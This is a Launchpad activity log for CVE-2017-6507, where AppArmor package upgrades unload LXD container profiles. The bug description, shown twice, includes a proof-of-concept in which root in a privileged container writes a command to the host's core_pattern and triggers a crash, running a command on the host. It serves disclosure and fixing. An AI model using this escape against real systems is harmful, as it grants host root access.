Activity log for bug #1668892

Date Who What changed Old value New value Message
2017-03-01 08:39:05 Stéphane Graber bug added bug
2017-03-01 08:41:10 Stéphane Graber bug added subscriber Ubuntu Container Security team
2017-03-03 23:21:24 Tyler Hicks apparmor (Ubuntu): status New In Progress
2017-03-03 23:21:30 Tyler Hicks apparmor (Ubuntu): assignee Tyler Hicks (tyhicks)
2017-03-08 00:43:07 Tyler Hicks cve linked 2017-6507
2017-03-11 00:13:31 Tyler Hicks bug task added apparmor
2017-03-11 00:13:39 Tyler Hicks apparmor: status New In Progress
2017-03-11 00:13:42 Tyler Hicks apparmor: importance Undecided Critical
2017-03-11 00:13:44 Tyler Hicks apparmor: assignee Tyler Hicks (tyhicks)
2017-03-11 00:15:11 Tyler Hicks attachment added 0001-parser-Preserve-unknown-profiles-when-restarting-app.patch https://bugs.launchpad.net/apparmor/+bug/1668892/+attachment/4835672/+files/0001-parser-Preserve-unknown-profiles-when-restarting-app.patch
2017-03-11 00:16:43 Tyler Hicks attachment added 0002-utils-Add-aa-remove-unknown-utility-to-unload-unknow.patch https://bugs.launchpad.net/apparmor/+bug/1668892/+attachment/4835673/+files/0002-utils-Add-aa-remove-unknown-utility-to-unload-unknow.patch
2017-03-11 00:16:52 Tyler Hicks bug added subscriber Tyler Hicks
2017-03-16 16:10:27 Christian Brauner bug added subscriber Christian Brauner
2017-03-16 16:15:41 Christian Brauner bug added subscriber Jon Grimm
2017-03-17 13:12:47 Tyler Hicks bug added subscriber intrigeri
2017-03-23 22:48:59 Tyler Hicks summary apparmor package upgrades unload all LXD profiles apparmor package upgrades unload privately managed profiles
2017-03-23 22:49:22 Tyler Hicks summary apparmor package upgrades unload privately managed profiles CVE-2017-6507: apparmor package upgrades unload privately managed profiles
2017-03-23 22:55:27 Tyler Hicks description Apparmor package upgrades unloads all LXD apparmor profiles, making all LXD containers unconfined. Example: # Create an unprivileged and a privileged container stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1 Creating c1 Starting c1 stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true Creating c2 Starting c2 # Look at their apparmor profiles (expected values) stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce) stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce) # Apply an apparmor upgrade stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Done The following packages will be upgraded: apparmor 1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. Need to get 493 kB of archives. After this operation, 8,192 B of additional disk space will be used. Do you want to continue? [Y/n] Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB] Fetched 493 kB in 0s (34.9 MB/s) Preconfiguring packages ... (Reading database ... 221457 files and directories currently installed.) Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ... Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ... Processing triggers for ureadahead (0.100.0-19) ... Setting up apparmor (2.11.0-2ubuntu1) ... Installing new version of config file /etc/apparmor.d/abstractions/X ... Installing new version of config file /etc/apparmor.d/abstractions/authentication ... Installing new version of config file /etc/apparmor.d/abstractions/base ... Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ... Installing new version of config file /etc/apparmor.d/abstractions/gnome ... Installing new version of config file /etc/apparmor.d/abstractions/nameservice ... Installing new version of config file /etc/apparmor.d/abstractions/php5 ... Installing new version of config file /etc/apparmor.d/abstractions/samba ... Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ... Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ... Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ... Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ... Installing new version of config file /etc/apparmor.d/abstractions/user-mail ... update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd Processing triggers for systemd (232-18ubuntu1) ... Processing triggers for man-db (2.7.6.1-1) ... # And look at the now unconfined containers stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current unconfined//&:lxd-c1_<var-lib-lxd>://unconfined stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current unconfined//&:lxd-c2_<var-lib-lxd>://unconfined # The LXD profiles are also entirely gone stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ # And to confirm that apparmor is in fact gone stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash root@c2:~# mount -t proc proc /mnt root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern root@c2:~# sleep 30& [1] 468 root@c2:~# kill -SIGSEGV $! root@c2:~# [1]+ Segmentation fault (core dumped) sleep 30 root@c2:~# exit stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned -rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981 Restarting the apparmor init script, upstart job, or systemd service has historically removed all loaded profiles unknown to the well-known profile locations. In upstream AppArmor terms, this is /etc/apparmor.d/ but Ubuntu also adds additional locations. This behavior has previously caused a problem where libvirt-managed profiles would be unloaded upon "restarting AppArmor": https://launchpad.net/bugs/702774 Stéphane Graber created this bug report after he noticed that the same behavior was causing similar problems with lxd-manager profiles. In addition, AppArmor distro packaging may trigger an "AppArmor restart" when installing a new version of AppArmor, resulting in the same profile removal problem. This is true for the Debian/Ubuntu packaging. The upstream AppArmor team has decided to remove this functionality from the AppArmor restart logic to prevent a similar issue happening with the next external project that needs to privately manage their own set of AppArmor profiles. === Original Bug Report === Apparmor package upgrades unloads all LXD apparmor profiles, making all LXD containers unconfined. Example: # Create an unprivileged and a privileged container stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1 Creating c1 Starting c1 stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true Creating c2 Starting c2 # Look at their apparmor profiles (expected values) stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce) stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce) # Apply an apparmor upgrade stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Done The following packages will be upgraded:   apparmor 1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. Need to get 493 kB of archives. After this operation, 8,192 B of additional disk space will be used. Do you want to continue? [Y/n] Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB] Fetched 493 kB in 0s (34.9 MB/s) Preconfiguring packages ... (Reading database ... 221457 files and directories currently installed.) Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ... Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ... Processing triggers for ureadahead (0.100.0-19) ... Setting up apparmor (2.11.0-2ubuntu1) ... Installing new version of config file /etc/apparmor.d/abstractions/X ... Installing new version of config file /etc/apparmor.d/abstractions/authentication ... Installing new version of config file /etc/apparmor.d/abstractions/base ... Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ... Installing new version of config file /etc/apparmor.d/abstractions/gnome ... Installing new version of config file /etc/apparmor.d/abstractions/nameservice ... Installing new version of config file /etc/apparmor.d/abstractions/php5 ... Installing new version of config file /etc/apparmor.d/abstractions/samba ... Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ... Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ... Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ... Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ... Installing new version of config file /etc/apparmor.d/abstractions/user-mail ... update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd Processing triggers for systemd (232-18ubuntu1) ... Processing triggers for man-db (2.7.6.1-1) ... # And look at the now unconfined containers stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current unconfined//&:lxd-c1_<var-lib-lxd>://unconfined stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current unconfined//&:lxd-c2_<var-lib-lxd>://unconfined # The LXD profiles are also entirely gone stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ # And to confirm that apparmor is in fact gone stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash root@c2:~# mount -t proc proc /mnt root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern root@c2:~# sleep 30& [1] 468 root@c2:~# kill -SIGSEGV $! root@c2:~# [1]+ Segmentation fault (core dumped) sleep 30 root@c2:~# exit stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned -rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981
2017-03-23 22:57:01 Tyler Hicks information type Private Security Public Security
2017-03-23 23:03:31 Tyler Hicks summary CVE-2017-6507: apparmor package upgrades unload privately managed profiles CVE-2017-6507: apparmor service restarts and package upgrades unload privately managed profiles
2017-03-24 00:26:47 Ubuntu Foundations Team Bug Bot tags patch
2017-03-24 05:09:19 Launchpad Janitor branch linked lp:apparmor
2017-03-24 05:12:01 Tyler Hicks apparmor: status In Progress Fix Committed
2017-03-24 05:12:11 Tyler Hicks apparmor: milestone 2.12
2017-03-24 06:16:41 Launchpad Janitor branch linked lp:~apparmor-dev/apparmor/apparmor-ubuntu-citrain
2017-03-24 09:35:18 Launchpad Janitor apparmor (Ubuntu): status In Progress Fix Released
2017-03-24 17:44:17 Launchpad Janitor branch linked lp:apparmor/2.10
2017-03-24 17:46:32 Launchpad Janitor branch linked lp:apparmor/2.9
2017-03-24 18:01:30 Christian Boltz nominated for series apparmor/2.10
2017-03-24 18:01:30 Christian Boltz bug task added apparmor/2.10
2017-03-24 18:01:30 Christian Boltz nominated for series apparmor/2.11
2017-03-24 18:01:30 Christian Boltz bug task added apparmor/2.11
2017-03-24 18:01:45 Christian Boltz apparmor/2.10: milestone 2.11.1
2017-03-24 18:01:49 Christian Boltz apparmor/2.10: status New Fix Committed
2017-03-24 18:01:52 Christian Boltz apparmor/2.11: status New Fix Committed
2017-03-24 18:01:59 Christian Boltz apparmor/2.11: milestone 2.11.1
2017-03-24 18:02:07 Christian Boltz apparmor/2.10: milestone 2.11.1 2.10.3
2017-03-24 18:02:23 Christian Boltz nominated for series apparmor/2.9
2017-03-24 18:02:23 Christian Boltz bug task added apparmor/2.9
2017-03-24 18:02:30 Christian Boltz apparmor/2.9: milestone 2.9.5
2017-03-24 18:02:34 Christian Boltz apparmor/2.9: status New Fix Committed
2017-03-28 23:08:15 paz bug added subscriber paz
2017-10-19 09:34:24 John Johansen apparmor: status Fix Committed Won't Fix
2017-10-19 09:34:30 John Johansen apparmor: status Won't Fix Fix Committed
2017-10-19 09:34:35 John Johansen apparmor/2.10: status Fix Committed Fix Released
2017-10-19 09:34:40 John Johansen apparmor/2.11: status Fix Committed Fix Released
2017-10-19 09:34:45 John Johansen apparmor/2.9: status Fix Committed Fix Released
2018-04-22 11:27:01 Christian Boltz apparmor: status Fix Committed Fix Released